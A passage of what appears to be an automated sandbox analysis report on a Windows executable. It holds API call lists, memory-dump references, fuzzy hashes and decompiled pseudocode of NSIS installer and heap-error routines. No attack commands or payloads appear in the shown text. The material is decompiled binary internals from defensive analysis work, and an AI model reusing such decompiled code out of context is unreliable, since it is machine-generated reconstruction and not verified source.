                                                                                                    • CloseHandle.KERNEL32(00000000,0041F058,0041F058,?,0041F058,00000000), ref: 00403503
                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403558
                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403594
                                                                                                    • ExitProcess.KERNEL32 ref: 004035B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                    • String ID: /D=$ _?=$"$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                    • API String ID: 2278157092-1845187605
                                                                                                    • Opcode ID: b237e16242222b526cfbc7eec5e85b12329012a3d6ce1955aa8a6be5a5dec380
                                                                                                    • Instruction ID: d9df3101e86bd055252ea398e1a167ecdf9755d8b7b18b8fa076e16bcd865dbe
                                                                                                    • Opcode Fuzzy Hash: b237e16242222b526cfbc7eec5e85b12329012a3d6ce1955aa8a6be5a5dec380
                                                                                                    • Instruction Fuzzy Hash: E191D231A087417EE7216F609D49B2B7EACEB01306F44457BF941B61E2C77CAE058B6E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B3B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B3B38F
                                                                                                    • *** enter .exr %p for the exception record, xrefs: 00B3B4F1
                                                                                                    • *** Inpage error in %ws:%s, xrefs: 00B3B418
                                                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00B3B323
                                                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00B3B476
                                                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 00B3B352
                                                                                                    • read from, xrefs: 00B3B4AD, 00B3B4B2
                                                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00B3B53F
                                                                                                    • The resource is owned exclusively by thread %p, xrefs: 00B3B374
                                                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00B3B2DC
                                                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B3B3D6
                                                                                                    • <unknown>, xrefs: 00B3B27E, 00B3B2D1, 00B3B350, 00B3B399, 00B3B417, 00B3B48E
                                                                                                    • The resource is owned shared by %d threads, xrefs: 00B3B37E
                                                                                                    • an invalid address, %p, xrefs: 00B3B4CF
                                                                                                    • The instruction at %p tried to %s , xrefs: 00B3B4B6
                                                                                                    • *** then kb to get the faulting stack, xrefs: 00B3B51C
                                                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00B3B314
                                                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00B3B484
                                                                                                    • The instruction at %p referenced memory at %p., xrefs: 00B3B432
                                                                                                    • The critical section is owned by thread %p., xrefs: 00B3B3B9
                                                                                                    • *** enter .cxr %p for the context, xrefs: 00B3B50D
                                                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00B3B2F3
                                                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00B3B39B
                                                                                                    • Go determine why that thread has not released the critical section., xrefs: 00B3B3C5
                                                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00B3B47D
                                                                                                    • This failed because of error %Ix., xrefs: 00B3B446
                                                                                                    • write to, xrefs: 00B3B4A6
                                                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00B3B305
                                                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 00B3B48F
                                                                                                    • a NULL pointer, xrefs: 00B3B4E0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                    • API String ID: 0-108210295
                                                                                                    • Opcode ID: 3680b5769eb9dd93523b9ccb75cd90a6914547c8c7160194f2b2eae61695c683
                                                                                                    • Instruction ID: c0839f97b6d00a2e9a96d5ed8ecb3731f69dd737a02667370f2aa3d5f8524f77
                                                                                                    • Opcode Fuzzy Hash: 3680b5769eb9dd93523b9ccb75cd90a6914547c8c7160194f2b2eae61695c683
                                                                                                    • Instruction Fuzzy Hash: 07810575A40210FFCB226B058C87DAB3BB6EF96B51F91C0C4F2082B297D3618951D7B6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B41C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 44%
                                                                                                    			E00B41C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xa648a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A8B150();
				} else {
					E00A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0xb7589c);
				E00A8B150("Heap error detected at %p (heap handle %p)\n",  *0xb758a0);
				_t27 =  *0xb75898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00B41E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A8B150();
				} else {
					E00A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00A8B150("Error code: %d - %s\n",  *0xb75898);
				_t113 =  *0xb758a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A8B150();
					} else {
						E00A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A8B150("Parameter1: %p\n",  *0xb758a4);
				}
				_t115 =  *0xb758a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A8B150();
					} else {
						E00A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A8B150("Parameter2: %p\n",  *0xb758a8);
				}
				_t117 =  *0xb758ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A8B150();
					} else {
						E00A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A8B150("Parameter3: %p\n",  *0xb758ac);
				}
				_t119 =  *0xb758b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A8B150();
					} else {
						E00A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0xb758b4);
					E00A8B150("Last known valid blocks: before - %p, after - %p\n",  *0xb758b0);
				} else {
					_t120 =  *0xb758b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A8B150();
				} else {
					E00A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00A8B150("Stack trace available at %p\n", 0xb758c0);
			}











                                                                                                    0x00b41c10
                                                                                                    0x00b41c16
                                                                                                    0x00b41c1e
                                                                                                    0x00b41c3d
                                                                                                    0x00b41c3e
                                                                                                    0x00b41c20
                                                                                                    0x00b41c35
                                                                                                    0x00b41c3a
                                                                                                    0x00b41c44
                                                                                                    0x00b41c55
                                                                                                    0x00b41c5a
                                                                                                    0x00b41c65
                                                                                                    0x00b41c67
                                                                                                    0x00000000
                                                                                                    0x00b41c6e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b41c67
                                                                                                    0x00b41cdc
                                                                                                    0x00b41ce5
                                                                                                    0x00b41d04
                                                                                                    0x00b41d05
                                                                                                    0x00b41ce7
                                                                                                    0x00b41cfc
                                                                                                    0x00b41d01
                                                                                                    0x00b41d0b
                                                                                                    0x00b41d17
                                                                                                    0x00b41d1f
                                                                                                    0x00b41d25
                                                                                                    0x00b41d30
                                                                                                    0x00b41d4f
                                                                                                    0x00b41d50
                                                                                                    0x00b41d32
                                                                                                    0x00b41d47
                                                                                                    0x00b41d4c
                                                                                                    0x00b41d61
                                                                                                    0x00b41d67
                                                                                                    0x00b41d68
                                                                                                    0x00b41d6e
                                                                                                    0x00b41d79
                                                                                                    0x00b41d98
                                                                                                    0x00b41d99
                                                                                                    0x00b41d7b
                                                                                                    0x00b41d90
                                                                                                    0x00b41d95
                                                                                                    0x00b41daa
                                                                                                    0x00b41db0
                                                                                                    0x00b41db1
                                                                                                    0x00b41db7
                                                                                                    0x00b41dc2
                                                                                                    0x00b41de1
                                                                                                    0x00b41de2
                                                                                                    0x00b41dc4
                                                                                                    0x00b41dd9
                                                                                                    0x00b41dde
                                                                                                    0x00b41df3
                                                                                                    0x00b41df9
                                                                                                    0x00b41dfa
                                                                                                    0x00b41e00
                                                                                                    0x00b41e0a
                                                                                                    0x00b41e13
                                                                                                    0x00b41e32
                                                                                                    0x00b41e33
                                                                                                    0x00b41e15
                                                                                                    0x00b41e2a
                                                                                                    0x00b41e2f
                                                                                                    0x00b41e39
                                                                                                    0x00b41e4a
                                                                                                    0x00b41e02
                                                                                                    0x00b41e02
                                                                                                    0x00b41e08
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b41e08
                                                                                                    0x00b41e5b
                                                                                                    0x00b41e7a
                                                                                                    0x00b41e7b
                                                                                                    0x00b41e5d
                                                                                                    0x00b41e72
                                                                                                    0x00b41e77
                                                                                                    0x00b41e95

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                    • API String ID: 0-2897834094
                                                                                                    • Opcode ID: 4ccc836f6aa1507ed6b36c5a4fcfceb3547c521d8449efb0a8badc787b8b3904
                                                                                                    • Instruction ID: d192b237483c8128c2db67c16db67416b18cca06a5af8900795fdee206991490
                                                                                                    • Opcode Fuzzy Hash: 4ccc836f6aa1507ed6b36c5a4fcfceb3547c521d8449efb0a8badc787b8b3904
                                                                                                    • Instruction Fuzzy Hash: 9F618036D65544DFC311EB88DDD992073E4EB08F20B19C9FAF40D6F262D6649DC0AB1A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00404356, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 266stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 78%
                                                                                                    			E00404356(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr* _t138;
				signed int* _t145;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc70;
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040540B(0x3fb, _t162);
					E00405DC8(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040540B(0x3fb, _t162);
							if(E0040573A(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405B66(0x41f468, _t162);
							_t145 = 0;
							_t86 = E00405E88(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405B66(0x41f468, _t162);
								_t88 = E004056ED(0x41f468);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f468,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f468) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f468,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004056A0(0x41f468) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f468) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004047A6(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
									E004046F1(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f458);
									} else {
										E004046F1(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403F3A(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x42048c == _t145) {
									E004042EB();
								}
								 *0x42048c = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x4204a0;
							_v56 = E0040468B;
							_v52 = _t162;
							_v64 = E00405B88(0x3fb, 0x4204a0, _t162, 0x41f870, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405659(_t162);
								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == 0x429400) {
									E00405B88(0x3fb, 0x4204a0, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x4204a0) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x42048c =  &(( *0x42048c)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004056C6(_t162) != 0 && E004056ED(_t162) == 0) {
						E00405659(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403F18(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403F18(_t159);
					E00403F4D(_v12);
					_t138 = E00405E88(7);
					if(_t138 == 0) {
						L53:
						return E00403F7F(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}






































                                                                                                    0x0040435c
                                                                                                    0x00404363
                                                                                                    0x0040436f
                                                                                                    0x0040437d
                                                                                                    0x00404385
                                                                                                    0x00404389
                                                                                                    0x0040438f
                                                                                                    0x0040438f
                                                                                                    0x0040439b
                                                                                                    0x0040440f
                                                                                                    0x00404416
                                                                                                    0x004044eb
                                                                                                    0x004044f2
                                                                                                    0x00404501
                                                                                                    0x00404501
                                                                                                    0x00404505
                                                                                                    0x0040450b
                                                                                                    0x00404518
                                                                                                    0x0040451a
                                                                                                    0x0040451a
                                                                                                    0x00404528
                                                                                                    0x0040452d
                                                                                                    0x00404530
                                                                                                    0x00404537
                                                                                                    0x0040453a
                                                                                                    0x00404571
                                                                                                    0x00404573
                                                                                                    0x00404579
                                                                                                    0x00404580
                                                                                                    0x00404582
                                                                                                    0x00404582
                                                                                                    0x0040459e
                                                                                                    0x004045da
                                                                                                    0x00000000
                                                                                                    0x004045a0
                                                                                                    0x004045a3
                                                                                                    0x004045b7
                                                                                                    0x004045b9
                                                                                                    0x00000000
                                                                                                    0x004045b9
                                                                                                    0x0040453c
                                                                                                    0x00404540
                                                                                                    0x0040456f
                                                                                                    0x0040456f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00404542
                                                                                                    0x00404542
                                                                                                    0x0040454f
                                                                                                    0x00404554
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00404558
                                                                                                    0x0040455a
                                                                                                    0x0040455a
                                                                                                    0x00404565
                                                                                                    0x00404568
                                                                                                    0x0040456d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040456d
                                                                                                    0x004045c8
                                                                                                    0x004045cf
                                                                                                    0x004045d6
                                                                                                    0x004045dd
                                                                                                    0x004045dd
                                                                                                    0x004045e2
                                                                                                    0x004045e4
                                                                                                    0x004045ec
                                                                                                    0x004045f2
                                                                                                    0x004045f2
                                                                                                    0x00404602
                                                                                                    0x0040460c
                                                                                                    0x00404614
                                                                                                    0x0040462a
                                                                                                    0x00404616
                                                                                                    0x0040461a
                                                                                                    0x0040461a
                                                                                                    0x00404614
                                                                                                    0x0040462f
                                                                                                    0x00404634
                                                                                                    0x00404639
                                                                                                    0x00404642
                                                                                                    0x00404642
                                                                                                    0x0040464b
                                                                                                    0x0040464d
                                                                                                    0x0040464d
                                                                                                    0x00404659
                                                                                                    0x00404661
                                                                                                    0x0040466b
                                                                                                    0x0040466b
                                                                                                    0x00404670
                                                                                                    0x00000000
                                                                                                    0x00404670
                                                                                                    0x0040453a
                                                                                                    0x004044f4
                                                                                                    0x004044fb
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004044fb
                                                                                                    0x0040441c
                                                                                                    0x00404422
                                                                                                    0x0040443c
                                                                                                    0x00404441
                                                                                                    0x0040444b
                                                                                                    0x00404452
                                                                                                    0x00404461
                                                                                                    0x00404464
                                                                                                    0x00404467
                                                                                                    0x0040446e
                                                                                                    0x00404476
                                                                                                    0x00404479
                                                                                                    0x0040447d
                                                                                                    0x00404484
                                                                                                    0x0040448c
                                                                                                    0x004044e4
                                                                                                    0x0040448e
                                                                                                    0x0040448f
                                                                                                    0x00404496
                                                                                                    0x004044a0
                                                                                                    0x004044a8
                                                                                                    0x004044b5
                                                                                                    0x004044c9
                                                                                                    0x004044cd
                                                                                                    0x004044cd
                                                                                                    0x004044c9
                                                                                                    0x004044d2
                                                                                                    0x004044dd
                                                                                                    0x004044dd
                                                                                                    0x0040448c
                                                                                                    0x00000000
                                                                                                    0x00404441
                                                                                                    0x0040442f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00404435
                                                                                                    0x00000000
                                                                                                    0x0040439d
                                                                                                    0x0040439d
                                                                                                    0x004043a9
                                                                                                    0x004043b3
                                                                                                    0x004043c0
                                                                                                    0x004043c0
                                                                                                    0x004043c6
                                                                                                    0x004043cf
                                                                                                    0x004043d8
                                                                                                    0x004043db
                                                                                                    0x004043de
                                                                                                    0x004043e6
                                                                                                    0x004043e9
                                                                                                    0x004043ec
                                                                                                    0x004043f4
                                                                                                    0x004043fb
                                                                                                    0x00404402
                                                                                                    0x00404676
                                                                                                    0x00404688
                                                                                                    0x00404688
                                                                                                    0x0040440d
                                                                                                    0x00000000
                                                                                                    0x0040440d

                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32 ref: 004043A2
                                                                                                    • SetWindowTextA.USER32(?,?), ref: 004043CF
                                                                                                    • SHBrowseForFolderA.SHELL32(?,0041F870,?), ref: 00404484
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0040448F
                                                                                                    • lstrcmpiA.KERNEL32(00422E40,004204A0,00000000,?,?), ref: 004044C1
                                                                                                    • lstrcatA.KERNEL32(?,00422E40), ref: 004044CD
                                                                                                    • SetDlgItemTextA.USER32 ref: 004044DD
                                                                                                      • Part of subcall function 0040540B: GetDlgItemTextA.USER32 ref: 0040541E
                                                                                                      • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,0042A400,00429000,0042A400,00000000,00403214,0042A400,00000000,00403386), ref: 00405E20
                                                                                                      • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                      • Part of subcall function 00405DC8: CharNextA.USER32(?,0042A400,00429000,0042A400,00000000,00403214,0042A400,00000000,00403386), ref: 00405E32
                                                                                                      • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,00429000,0042A400,00000000,00403214,0042A400,00000000,00403386), ref: 00405E42
                                                                                                    • GetDiskFreeSpaceA.KERNEL32(0041F468,?,?,0000040F,?,0041F468,0041F468,?,00000000,0041F468,?,?,000003FB,?), ref: 00404596
                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B1
                                                                                                    • SetDlgItemTextA.USER32 ref: 0040462A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                    • String ID: @.B$A
                                                                                                    • API String ID: 2246997448-1561443927
                                                                                                    • Opcode ID: 6525314df4a180c9e7b66623ed26d8b7b6bbf618626a18de822d55977fdbc2f3
                                                                                                    • Instruction ID: fa341535892c43c3a67d7fcafb17cb6574160925603278dae289bcadb551eaae
                                                                                                    • Opcode Fuzzy Hash: 6525314df4a180c9e7b66623ed26d8b7b6bbf618626a18de822d55977fdbc2f3
                                                                                                    • Instruction Fuzzy Hash: 2D9170B1900218BBDB11AFA1CD84AAF7BB8EF45314F10847BF704B6291D77C9A41DB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00405B88, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 197stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 74%
                                                                                                    			E00405B88(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42367c - 4 + _t36 * 4);
				}
				_t74 =  *0x423ed8 + _t36;
				_t37 = 0x422e40;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
